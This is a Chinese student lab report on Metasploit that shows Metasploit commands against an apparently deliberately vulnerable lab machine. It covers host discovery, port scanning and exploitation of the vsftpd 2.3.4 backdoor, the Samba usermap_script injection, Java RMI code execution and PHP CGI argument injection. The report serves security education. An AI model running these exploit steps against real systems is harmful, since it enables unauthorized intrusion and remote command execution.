# 20222419 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

本周介绍了Metasploit Framework，它是一个强大的开源安全测试平台，提供了一系列工具和模块，用于发现、利用和验证软件漏洞，并且支持渗透测试人员和安全研究人员进行系统安全评估和漏洞研究。

2.实验过程

（1）前期渗透

查看ip地址：

①主机发现（可用Aux中的arp_sweep，search一下就可以use）

成功查询到靶机

②端口扫描：可以直接用nmap，也可以用Aux中的portscan/tcp等。

③选做：也可以扫系统版本、漏洞等。

目标主机运行的是Samba 3.0.20-Debian。

（2）Vsftpd源码包后门漏洞（21端口）

漏洞原理：在特定版本的vsftpd服务器程序中，被人恶意植入代码，当用户名以“😃”为结尾，服务器就会在6200端口监听，并且能够执行任意代码。

利用步骤：

在kali中执行msfconsole 启动metasploit

use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST XX.xx.xx.xx 设置要攻击的机器IP（靶机IP）
exploit/run 开始攻击

利用成功
执行uname –a、 pwd、 id等命令 验证

（3）SambaMS-RPC Shell命令注入漏洞（端口139）

漏洞原理：Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时，通过对/bin/sh的MS-RPC调用提交了恶意输入的话，就可能允许攻击者以nobody用户的权限执行任意命令。

利用步骤：

use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit 开始攻击

利用成功 执行uname–a验证

（4）Java RMI SERVER命令执行漏洞（1099端口）

漏洞原理：Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞，可被利用导致代码执行。

操作步骤：

首先查看1099端口是否打开。

1099端口开放。

use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST (靶机IP)
exploit/run
sessions -i id
shell (进入meterpreter时，使用whoami验证下)

（5）PHP CGI参数执行注入漏洞（80端口）

漏洞原理：CGI脚本没有正确处理请求参数，导致源代码泄露，允许远程攻击者在请求参数中插入执行命令。

在kali中执行msfconsole，启动metasploit

msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit/run 开始攻击

3.问题及解决方案

无

4.学习感悟、思考等

本次实验较为简单，全程都没有遇到什么问题，通过这次实验，我掌握了Metasploit的基本使用方法，还了解了多种常见漏洞的原理和利用方式。